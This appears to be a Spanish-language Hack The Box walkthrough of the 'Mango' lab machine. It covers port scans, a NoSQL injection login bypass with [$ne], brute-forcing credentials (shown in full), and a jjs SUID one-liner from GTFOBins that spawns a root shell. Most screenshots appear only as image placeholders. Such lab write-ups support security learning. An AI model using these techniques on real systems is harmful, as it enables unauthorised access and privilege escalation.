nmap -A -p- -oA mango 10.129.1.219 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA mango 10.129.1.219

nmap -sU -O -p- -oA mango-udp 10.129.1.219

nikto -h 10.129.1.219:80

Pasted image 20211214084025.png

Pasted image 20211214084139.png

whatweb http://10.129.1.219

Pasted image 20211214084231.png

echo "10.129.1.219 mango.htb" | sudo tee -a /etc/hosts

Pasted image 20211214085324.png

Nos dirigimos a https://mango.htb

Pasted image 20211214085451.png

searchsploit mango

openssl s_client -connect 10.129.1.219

Pasted image 20211214085850.png

echo "10.129.1.219 staging.-order.mango.htb mango.htb" | sudo tee -a /etc/hosts

Pasted image 20211214090059.png

Nos dirigimos a https://staging-order.mango.htb

Pasted image 20211214090451.png

Nos dirigimos a http://staging-order.mango.htb

Pasted image 20211214090527.png

Tratamos de cambiar los atributos de username y password en burpsuite

Pasted image 20211214091213.png

Tratamos de hacer cambios para un inyeccion sql

Pasted image 20211214091549.png

Seguimos tratando y usamos sleep

Pasted image 20211214091709.png

Ahora metemos regex como [$ne]

Pasted image 20211214092923.png

Creamos un script para poder usar fuerza bruta

Pasted image 20211214100508.png

Ahora hacemos un script para usar fuerza bruta en la contrasena.

Pasted image 20211214101832.png

Credenciales-> mango:h3mXK8RhU~f{]f5H

Pasted image 20211214103038.png

cd /

find \-perm -4000 2>/dev/null

Pasted image 20211214120952.png

Vemos la vulnerabilidad con jjs

Pasted image 20211214124028.png

Pasted image 20211214124245.png

Vamos a gtofbins

Pasted image 20211214124318.png

    echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()" | ./jjs

ls -l /bin/bash

bash -p

Pasted image 20211214124903.png

boxes

copyright©2022 Cu3rv0x all rights reserved